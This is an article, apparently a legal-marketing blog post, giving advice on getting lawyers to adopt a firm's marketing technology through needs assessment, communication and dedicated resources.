When considering lawyers’ love/hate relationship with their firm’s marketing technology infrastructure, it is important to consider the lawyer’s perspective when it comes to change management and technology adoption. By nature, lawyers are skeptical, hypercritical, risk-averse, and reluctant to change. These attributes are certainly beneficial for practicing law, but not so much for encouraging marketing technology adoption. This is why it can sometimes feel like you are herding cats, except these cats are extremely smart, have opposable thumbs, and argue for sport.
While lawyers and technology might not seem like a match made in heaven, you can follow these steps to ensure greater adoption and utilization of your marketing technology:
1. Needs Assessment
The beauty of technology is that it can do so many things, the problem with technology is… it can do so many things. For technology to succeed it has to adequately satisfy the end users’ needs. Because each firm has its own set of unique needs, technology selection should start with a needs assessment. Interviews should be conducted with key stakeholders to determine your organization’s specific needs and requirements.
As a follow-up to the needs assessment, interview user groups like attorneys, partners and even their assistants, to understand their needs and requirements, and understand their day-to-day processes and problems. These groups each define value differently, meaning that each group will have its own unique needs or set of requirements. Making these users part of the process upfront will increase the likelihood they’ll adopt the technology later on.
2. Communicate
Like any good love affair, a successful technology deployment requires extensive communication. Attorneys must be convinced that the technology will not only benefit the firm, but them individually. It can be helpful to take the time to craft a formal communication plan -starting with an announcement coming from firm leadership outlining the system’s benefits. Realistic expectations should be set, not only for the system but also for user requirements.
Next, establish, document, and distribute any processes and procedures necessary to support the implementation. Most importantly, sharing is caring, so always communicate when goals have been reached or solicit feedback from the end users.
3. Resources
All good relationships require attention. Oftentimes, firms forget to account for the long-term costs associated with a technology deployment. For a successful technology deployment, firms must dedicate necessary resources including time, money, and people. It also takes the coordinated efforts of everyone in the firm, so be sure to invite everyone who may need to be involved, such as:
Technical support to assist with implementation and integrations
Training programs with outlined criteria for different user groups
Data stewards (internal or outsourced) to make sure data is clean, correct and complete
The marketing and business development departments that will be tasked with developing and executing a communication strategy
Firm leadership and key attorneys whose support can be used to drive adoption